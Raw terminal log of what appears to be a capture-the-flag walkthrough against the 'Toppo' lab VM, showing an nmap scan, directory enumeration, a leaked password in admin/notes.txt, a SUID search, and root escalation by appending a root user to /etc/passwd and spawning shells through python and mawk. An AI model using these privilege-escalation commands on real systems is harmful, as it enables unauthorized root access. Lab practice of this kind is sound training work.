└─$ nmap -sSCV -p 22,80,111,43181 192.168.56.145
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 20:28 PDT
Nmap scan report for 192.168.56.145
Host is up (0.0019s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34525/tcp6  status
|   100024  1          43181/tcp   status
|   100024  1          56485/udp6  status
|_  100024  1          56988/udp   status
43181/tcp open  status  1 (RPC #100024)


[22:06:02] 403 -  294B  - /.php3
[22:06:04] 200 -    1KB - /about.html
[22:06:05] 301 -  316B  - /admin  ->  http://192.168.56.145/admin/
[22:06:05] 200 -  454B  - /admin/
[22:06:11] 200 -    2KB - /contact.html
[22:06:11] 301 -  314B  - /css  ->  http://192.168.56.145/css/
[22:06:14] 200 -  947B  - /gulpfile.js
[22:06:14] 301 -  314B  - /img  ->  http://192.168.56.145/img/
[22:06:15] 200 -  549B  - /js/
[22:06:16] 200 -    1KB - /LICENSE
[22:06:16] 301 -  315B  - /mail  ->  http://192.168.56.145/mail/
[22:06:16] 200 -  460B  - /mail/
[22:06:16] 301 -  317B  - /manual  ->  http://192.168.56.145/manual/
[22:06:16] 200 -  201B  - /manual/index.html
[22:06:18] 200 -  256KB - /package-lock.json
[22:06:18] 200 -    1KB - /package.json
[22:06:20] 200 -    3KB - /post.html
[22:06:21] 200 -    4KB - /README.md
[22:06:22] 403 -  303B  - /server-status/
[22:06:22] 403 -  302B  - /server-status
[22:06:26] 200 -  480B  - /vendor/

http://192.168.56.145/admin/notes.txt

note to myself :

I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

ted@Toppo:/var/www/html$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount

python -c "open('/etc/passwd','a+').write('new:\$1\$new\$.Nm5wgdVZR7.gAjnHaRK40:0:0::/root/bin/bash')"

su new
Password: 
root@Toppo:/# id
uid=0(root) gid=0(root) groups=0(root)
root@Toppo:/root# cat flag.txt 
_________                                  
|  _   _  |                                 
|_/ | | \_|.--.   _ .--.   _ .--.    .--.   
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \ 
   _| |_ | \__. | | \__/ | | \__/ || \__. | 
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'  
                 [__|     [__|              




Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

bash-4.3$ python2.7 -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

ted@Toppo:/usr/games$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root
